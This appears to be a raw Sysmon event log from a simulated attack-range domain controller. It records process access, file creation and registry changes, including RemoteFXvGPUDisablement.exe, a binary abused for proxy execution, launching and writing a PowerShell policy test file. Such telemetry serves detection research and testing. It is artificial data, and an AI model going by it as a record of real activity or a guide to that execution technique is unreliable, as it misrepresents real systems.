System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.908{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.830{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:01.830{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.830{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.830{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:01.627{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000001079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:01.174{59A5CD1D-8E46-6005-1100-00000000A301}11722044C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:01.174{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.174{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x80000000000000001076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.143{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Windows\Temp\__PSScriptPolicyTest_dc2ng1tb.gib.ps12021-01-18 13:34:01.143 13241300x80000000000000001075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:01.111{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000378) 10341000x80000000000000001074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.111{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:01.111{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.111{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:01.049{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_jy0wdfx4.0qq.ps12021-01-18 13:34:01.049 11241100x80000000000000001070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.049{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_1pz02ssh.3es.ps12021-01-18 13:34:01.033 10341000x80000000000000001069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:00.986{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:00.986{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:00.627{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:00.627{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:00.627{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 
10341000x80000000000000001064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.486{00000000-0000-0000-0000-000000000000}24442520C:\Windows\system32\conhost.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.486{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2444C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.424{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.424{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.330{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005d9) 10341000x80000000000000001059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 